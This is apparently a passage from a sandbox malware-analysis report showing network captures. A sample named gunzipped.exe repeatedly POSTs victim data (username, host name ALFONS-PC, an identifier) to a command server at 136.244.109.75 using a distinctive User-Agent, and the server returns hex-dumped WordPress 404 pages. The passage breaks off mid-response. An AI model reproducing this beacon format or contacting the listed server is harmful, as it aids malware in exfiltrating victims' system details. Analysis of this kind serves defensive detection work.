                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.549707136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:53.759072065 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:16:53.962456942 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:16:54.978631020 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:53 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:16:54.978657961 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:16:54.978676081 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:16:54.978694916 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:16:54.978717089 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:16:54.978738070 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:16:54.978756905 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:16:54.978775024 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:16:54.978792906 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:16:54.978821993 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.549708136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:55.317147970 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:16:55.520426035 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:16:56.425553083 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:55 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:16:56.425570011 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:16:56.425580978 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:16:56.425592899 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:16:56.425604105 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:16:56.425616026 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:16:56.425627947 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:16:56.425638914 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:16:56.425652027 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:16:56.425663948 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.549709136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:56.772779942 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:16:56.980240107 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:16:57.881382942 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:56 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 